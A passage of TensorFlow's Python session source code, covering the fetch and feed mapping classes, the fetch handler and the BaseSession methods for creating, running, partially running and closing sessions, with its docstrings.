"""The underlying TensorFlow graph, to be used in building Operations."""
raise NotImplementedError('graph')
@property
def sess_str(self):
"""The TensorFlow process to which this session will connect."""
raise NotImplementedError('sess_str')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations in the session. See `BaseSession.run()` for details."""
raise NotImplementedError('run')
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError('partial_run_setup')
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with additional feeds and fetches."""
raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
return ops.IndexedSlicesValue(
fetched_vals[0], fetched_vals[1],
fetched_vals[2] if len(fetched_vals) == 3 else None)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
# fetch_fn : Type -> (list of Tensors,
# lambda: list of fetched np.ndarray -> TypeVal)
# feed_fn1 : Type, TypeVal -> list of (Tensor, value)
# feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
# SparseTensors are fetched as SparseTensorValues. They can be fed
# SparseTensorValues or normal tuples.
(sparse_tensor.SparseTensor, lambda fetch: ([
fetch.indices, fetch.values, fetch.dense_shape
], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
lambda feed, feed_val: list(
zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
lambda feed: [feed.indices, feed.values, feed.dense_shape]),
# IndexedSlices are fetched as IndexedSlicesValues. They can be fed
# IndexedSlicesValues or normal tuples.
(ops.IndexedSlices,
lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
else [fetch.values, fetch.indices, fetch.dense_shape
], _get_indexed_slices_value_from_fetches),
_get_feeds_for_indexed_slices,
lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape]),
# The default catches all other types and performs no expansions.
(object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
tensor_type,
fetch_function,
feed_function=None,
feed_function_for_partial_run=None):
"""Register fetch and feed conversion functions for `tf.Session.run()`.
This function registers a triple of conversion functions for fetching and/or
feeding values of user-defined types in a call to tf.Session.run().
An example
```python
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = tf.square(tensor)
#you can define conversion functions as follows:
fetch_function = lambda squared_tensor:([squared_tensor.sq],
lambda val: val[0])
feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_function_for_partial_run = lambda feed: [feed.sq]
#then after invoking this register function, you can use as follows:
session.run(squared_tensor1,
feed_dict = {squared_tensor2 : some_numpy_array})
```
Args:
tensor_type: The type for which you want to register a conversion function.
fetch_function: A callable that takes an object of type `tensor_type` and
returns a tuple, where the first element is a list of `tf.Tensor` objects,
and the second element is a callable that takes a list of ndarrays and
returns an object of some value type that corresponds to `tensor_type`.
fetch_function describes how to expand fetch into its component Tensors
and how to contract the fetched results back into a single return value.
feed_function: A callable that takes feed_key and feed_value as input, and
returns a list of tuples (feed_tensor, feed_val), feed_key must have type
`tensor_type`, and feed_tensor must have type `tf.Tensor`. Each feed
function describes how to unpack a single fed value and map it to feeds of
one or more tensors and their corresponding values.
feed_function_for_partial_run: A callable for specifying tensor values to
feed when setting up a partial run, which takes a `tensor_type` type
object as input, and returns a list of Tensors.
Raises:
ValueError: If `tensor_type` has already been registered.
"""
for conversion_function in _REGISTERED_EXPANSIONS:
if issubclass(conversion_function[0], tensor_type):
raise ValueError('%s has already been registered so ignore it.' %
tensor_type)
_REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
feed_function_for_partial_run))
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
the list tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
class _ElementFetchMapper(_FetchMapper):
"""Fetch mapper for singleton tensors and ops."""
def __init__(self, fetches, contraction_fn):
"""Creates an _ElementFetchMapper.
This is the fetch mapper used for leaves in the fetch struct. Because of
the expansions mechanism, a leaf can actually fetch more than one tensor.
Also note that the fetches here can be just strings (tensor or op names) or
any other object that the graph knows how to convert to a tensor, such as a
Variable. So we have to run each fetch through `as_graph_element()` to get
the corresponding tensor or op.
Args:
fetches: List of objects, as returned by a fetch_fn defined in
_REGISTERED_EXPANSIONS.
contraction_fn: Callable as returned by a fetch_fn.
"""
self._unique_fetches = []
for fetch in fetches:
try:
self._unique_fetches.append(ops.get_default_graph().as_graph_element(
fetch, allow_tensor=True, allow_operation=True))
except TypeError as e:
raise TypeError('Fetch argument %r has invalid type %r, '
'must be a string or Tensor. (%s)' %
(fetch, type(fetch), str(e)))
except ValueError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
except KeyError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
self._contraction_fn = contraction_fn
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
if not values:
# 'Operation' case
return None
else:
return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
"""
unique_fetches = []
value_indices = []
seen_fetches = {}
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(id(f))
if j is None:
j = len(seen_fetches)
seen_fetches[id(f)] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
class _ListFetchMapper(_FetchMapper):
"""Fetch mapper for lists, tuples, and namedtuples."""
def __init__(self, fetches):
"""Creates a _ListFetchMapper.
Args:
fetches: List, tuple, or namedtuple of fetches.
"""
if isinstance(fetches, wrapt.ObjectProxy):
self._fetch_type = type(fetches.__wrapped__)
else:
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
# Create the list of results for each mapper.
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
# Return a value of the original type of the fetches.
if issubclass(self._fetch_type, list):
return results
elif self._fetch_type == tuple:
return tuple(results)
else:
# This is the code path for namedtuple.
return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
"""Fetch mapper for dicts."""
def __init__(self, fetches):
"""Creates a _DictFetchMapper.
Args:
fetches: Dict of fetches.
"""
self._fetch_type = type(fetches)
self._keys = fetches.keys()
self._mappers = [
_FetchMapper.for_fetch(fetch) for fetch in fetches.values()
]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = self._fetch_type()
for k, m, vi in zip(self._keys, self._mappers, self._value_indices):
results[k] = m.build_results([values[j] for j in vi])
return results
class _AttrsFetchMapper(_FetchMapper):
"""Fetch mapper for attrs decorated classes."""
def __init__(self, fetches):
"""Creates a _AttrsFetchMapper.
Args:
fetches: An instance of an attrs decorated class.
"""
values = _get_attrs_values(fetches)
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in values]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
return self._fetch_type(*results)
class _FetchHandler(object):
"""Handler for structured fetches.
Given a graph, a user-provided structure for fetches, and a feed dict, this
class takes care of generating a list of tensor names to fetch and op names
to run for a low level `run()` call.
Given the results of the low level run call, this class can also rebuild a
result structure matching the user-provided structure for fetches, but
containing the corresponding results.
"""
# TODO(touts): Make this class also take care of destructuring the feed
# dict instead of doing it in the callers.
def __init__(self, graph, fetches, feeds, feed_handles=None):
"""Creates a fetch handler.
Args:
graph: Graph of the fetches. Used to check for fetchability and to
convert all fetches to tensors or ops as needed.
fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
feeds: A feed dict where keys are Tensors.
feed_handles: A dict from feed Tensors to TensorHandle objects used as
direct feeds.
"""
with graph.as_default():
self._fetch_mapper = _FetchMapper.for_fetch(fetches)
self._fetches = []
self._targets = []
self._feeds = feeds
self._feed_handles = feed_handles or {}
self._ops = []
self._fetch_handles = {}
for fetch in self._fetch_mapper.unique_fetches():
if isinstance(fetch, ops.Operation):
self._assert_fetchable(graph, fetch)
self._targets.append(fetch)
self._ops.append(True)
else:
self._assert_fetchable(graph, fetch.op)
self._fetches.append(fetch)
self._ops.append(False)
# Remember the fetch if it is for a tensor handle.
if (isinstance(fetch, ops.Tensor) and
(fetch.op.type == 'GetSessionHandle' or
fetch.op.type == 'GetSessionHandleV2')):
self._fetch_handles[fetch.experimental_ref()] = fetch.op.inputs[0].dtype
self._final_fetches = [
x for x in self._fetches if x.experimental_ref() not in feeds
]
def _assert_fetchable(self, graph, op):
if not graph.is_fetchable(op):
raise errors.InaccessibleTensorError(
'Operation %r has been marked as not fetchable. Typically this'
' happens when it is defined in another function or code block.'
' Use return values,explicit Python locals or TensorFlow collections'
' to access it.'
% op.name)
def fetches(self):
"""Return the unique names of tensors to fetch.
Returns:
A list of strings.
"""
return self._final_fetches
def targets(self):
"""Return the unique names of ops to run.
Returns:
A list of strings.
"""
return self._targets
def build_results(self, session, tensor_values):
"""Build results matching the original fetch shape.
`tensor_values` must be a list of the same length as
the one returned by `fetches()`, and holding the requested
fetch values.
This method builds a struct with the same shape as the original `fetches`
passed to the constructor, in which the fetches are replaced by their
fetched value.
Args:
session: The enclosing session. Used for tensor handles.
tensor_values: List of values matching the list returned by fetches().
Returns:
A structure of the same shape as the original `fetches` argument but
containing tensors or None (for fetched ops).
"""
full_values = []
assert len(self._final_fetches) == len(tensor_values)
i = 0
j = 0
for is_op in self._ops:
if is_op:
full_values.append(None)
else:
# If the fetch was in the feeds, use the fed value, otherwise
# use the returned value.
if self._fetches[i].experimental_ref() in self._feed_handles:
# A fetch had a corresponding direct TensorHandle feed. Call eval()
# to obtain the Tensor value from the TensorHandle.
value = self._feed_handles[self._fetches[i].experimental_ref()].eval()
else:
value = self._feeds.get(self._fetches[i].experimental_ref())
if value is None:
value = tensor_values[j]
j += 1
dtype = self._fetch_handles.get(self._fetches[i].experimental_ref())
if dtype:
full_values.append(session_ops.TensorHandle(value, dtype, session))
else:
full_values.append(value)
i += 1
assert j == len(tensor_values)
return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
"""Utility function for transitioning to the new session API.
Args:
tensor_list: a list of `Tensor`s.
Returns:
A list of each `Tensor`s name (as byte arrays).
"""
return [compat.as_bytes(t.name) for t in tensor_list]
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
def __init__(self, target='', graph=None, config=None):
"""Constructs a new TensorFlow session.
Args:
target: (Optional) The TensorFlow execution engine to connect to.
graph: (Optional) The graph to be used. If this argument is None, the
default graph will be used.
config: (Optional) ConfigProto proto used to configure the session. If no
config is specified, the global default will be used. The global default
can be configured via the tf.config APIs.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
creating the TensorFlow session.
TypeError: If one of the arguments has the wrong type.
"""
_python_session_create_counter.get_cell().increase_by(1)
if graph is None:
self._graph = ops.get_default_graph()
else:
if not isinstance(graph, ops.Graph):
raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
self._graph = graph
self._closed = False
if target is not None:
try:
self._target = compat.as_bytes(target)
except TypeError:
if isinstance(target, config_pb2.ConfigProto):
raise TypeError('target must be a string, but got %s.'
' Did you do "Session(config)" instead of'
' "Session(config=config)"?' % type(target))
raise TypeError('target must be a string, but got %s' % type(target))
else:
self._target = None
self._delete_lock = threading.Lock()
self._dead_handles = []
if config is None:
config = context.context().config
if not isinstance(config, config_pb2.ConfigProto):
raise TypeError('config must be a tf.ConfigProto, but got %s' %
type(config))
if (mixed_precision_global_state.mixed_precision_graph_rewrite_is_enabled
and config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.OFF):
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
new_config.graph_options.rewrite_options.auto_mixed_precision = (
rewriter_config_pb2.RewriterConfig.ON)
config = new_config
elif (config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.ON):
mixed_precision_global_state.non_mixed_precision_session_created = True
self._config = config
self._add_shapes = config.graph_options.infer_shapes
self._session = None
opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
try:
# pylint: disable=protected-access
self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
# pylint: enable=protected-access
finally:
tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
Note: depending on the device, it is possible the usable memory could
be substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
if self._session is not None:
try:
tf_session.TF_DeleteSession(self._session)
except (AttributeError, TypeError):
# At shutdown, `c_api_util`, `tf_session`, or
# `tf_session.TF_DeleteSession` may have been garbage collected, causing
# the above method calls to fail. In this case, silently leak since the
# program is about to terminate anyway.
pass
self._session = None
@property
def graph(self):
"""The graph that was launched in this session."""
return self._graph
@property
def graph_def(self):
"""A serializable version of the underlying TensorFlow graph.
Returns:
A graph_pb2.GraphDef proto containing nodes for all of the Operations in
the underlying TensorFlow graph.
"""
return self._graph.as_graph_def(add_shapes=self._add_shapes)
@property
def sess_str(self):
return self._target
def as_default(self):
"""Returns a context manager that makes this object the default session.
Use with the `with` keyword to specify that calls to
`tf.Operation.run` or `tf.Tensor.eval` should be executed in
this session.
```python
c = tf.constant(..)
sess = tf.compat.v1.Session()
with sess.as_default():
assert tf.compat.v1.get_default_session() is sess
print(c.eval())
```
To get the current default session, use `tf.compat.v1.get_default_session`.
*N.B.* The `as_default` context manager *does not* close the
session when you exit the context, and you must close the session
explicitly.
```python
c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
print(c.eval())
# ...
with sess.as_default():
print(c.eval())
sess.close()
```
Alternatively, you can use `with tf.compat.v1.Session():` to create a
session that is automatically closed on exiting the context,
including when an uncaught exception is raised.
*N.B.* The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
*N.B.* Entering a `with sess.as_default():` block does not affect
the current default graph. If you are using multiple graphs, and
`sess.graph` is different from the value of
`tf.compat.v1.get_default_graph`, you must explicitly enter a
`with sess.graph.as_default():` block to make `sess.graph` the default
graph.
Returns:
A context manager using this session as the default session.
"""
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations and evaluates tensors in `fetches`.
This method runs one "step" of TensorFlow computation, by
running the necessary graph fragment to execute every `Operation`
and evaluate every `Tensor` in `fetches`, substituting the values in
`feed_dict` for the corresponding input values.
The `fetches` argument may be a single graph element, or an arbitrarily
nested list, tuple, namedtuple, dict, or OrderedDict containing graph
elements at its leaves. A graph element can be one of the following types:
* A `tf.Operation`.
The corresponding fetched value will be `None`.
* A `tf.Tensor`.
The corresponding fetched value will be a numpy ndarray containing the
value of that tensor.
* A `tf.SparseTensor`.
The corresponding fetched value will be a
`tf.compat.v1.SparseTensorValue`
containing the value of that sparse tensor.
* A `get_tensor_handle` op. The corresponding fetched value will be a
numpy ndarray containing the handle of that tensor.
* A `string` which is the name of a tensor or operation in the graph.
The value returned by `run()` has the same shape as the `fetches` argument,
where the leaves are replaced by the corresponding values returned by
TensorFlow.
Example:
```python
a = tf.constant([10, 20])
b = tf.constant([1.0, 2.0])
# 'fetches' can be a singleton
v = session.run(a)
# v is the numpy array [10, 20]
# 'fetches' can be a list.
v = session.run([a, b])
# v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
# 1-D array [1.0, 2.0]
# 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
MyData = collections.namedtuple('MyData', ['a', 'b'])
v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
# v is a dict with
# v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
# 'b' (the numpy array [1.0, 2.0])
# v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
# [10, 20].
```
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. Each key in `feed_dict` can be
one of the following types:
* If the key is a `tf.Tensor`, the
value may be a Python scalar, string, list, or numpy ndarray
that can be converted to the same `dtype` as that
tensor. Additionally, if the key is a
`tf.compat.v1.placeholder`, the shape of
the value will be checked for compatibility with the placeholder.
* If the key is a
`tf.SparseTensor`,
the value should be a
`tf.compat.v1.SparseTensorValue`.
* If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
should be a nested tuple with the same structure that maps to their
corresponding values as above.
Each value in `feed_dict` must be convertible to a numpy array of the dtype
of the corresponding key.
The optional `options` argument expects a [`RunOptions`] proto. The options
allow controlling the behavior of this particular step (e.g. turning tracing
on).
The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
appropriate, the non-Tensor output of this step will be collected there. For
example, when users turn on tracing in `options`, the profiled info will be
collected into this argument and passed back.
Args:
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (described
above).
feed_dict: A dictionary that maps graph elements to values (described
above).
options: A [`RunOptions`] protocol buffer
run_metadata: A [`RunMetadata`] protocol buffer
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary (described above).
Order in which `fetches` operations are evaluated inside the call
is undefined.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
`Tensor` that doesn't exist.
"""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
result = self._run(None, fetches, feed_dict, options_ptr,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return result
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with more feeds and fetches.
This is EXPERIMENTAL and subject to change.
To use partial execution, a user first calls `partial_run_setup()` and
then a sequence of `partial_run()`. `partial_run_setup` specifies the
list of feeds and fetches that will be used in the subsequent
`partial_run` calls.
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. See run() for more information.
Below is a simple example:
```python
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.multiply(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
res = sess.partial_run(h, r2, feed_dict={c: res})
```
Args:
handle: A handle for a sequence of partial runs.
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (see
documentation for `run`).
feed_dict: A dictionary that maps graph elements to values (described
above).
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary
(see documentation for `run`).
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# TODO(touts): Support feeding and fetching the same tensor.
return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
def _run(self, handle, fetches, feed_dict, options, run_metadata):
"""Perform either run or partial_run, depending the presence of `handle`."""
def _feed_fn(feed, feed_val):
for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed, feed_val)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
# Create request.
feed_dict_tensor = {}
feed_map = {}
# Validate and process feed_dict.
feed_handles = {}
if feed_dict:
feed_dict = nest.flatten_dict_items(feed_dict)
for feed, feed_val in feed_dict.items():
for subfeed, subfeed_val in _feed_fn(feed, feed_val):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
except Exception as e:
raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
e.args[0])
if isinstance(subfeed_val, ops.Tensor):
raise TypeError('The value of a feed cannot be a tf.Tensor object. '
'Acceptable feed values include Python scalars, '
'strings, lists, numpy ndarrays, or TensorHandles. '
'For reference, the tensor object was ' +
str(feed_val) + ' which was passed to the '
'feed with key ' + str(feed) + '.')
subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
subfeed_dtype, subfeed_val) != subfeed_val:
raise TypeError(
'Type of feed value ' + str(subfeed_val) + ' with type ' +
str(type(subfeed_val)) +
' is not compatible with Tensor type ' + str(subfeed_dtype) +
'. Try explicitly setting the type of the feed tensor'
' to a larger type (e.g. int64).')
is_tensor_handle_feed = isinstance(subfeed_val,
session_ops.TensorHandle)
if is_tensor_handle_feed:
np_val = subfeed_val.to_numpy_array()
feed_handles[subfeed_t.experimental_ref()] = subfeed_val
else:
np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)
if (not is_tensor_handle_feed and
not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
raise ValueError(
'Cannot feed value of shape %r for Tensor %r, '
'which has shape %r' %
(np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
if not self.graph.is_feedable(subfeed_t):
raise ValueError('Tensor %s may not be fed.' % subfeed_t)
feed_dict_tensor[subfeed_t.experimental_ref()] = np_val
feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(
self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)
# Run request and get response.
# We need to keep the returned movers alive for the following _do_run().
# These movers are no longer needed when _do_run() completes, and
# are deleted when `movers` goes out of scope when this _run() ends.
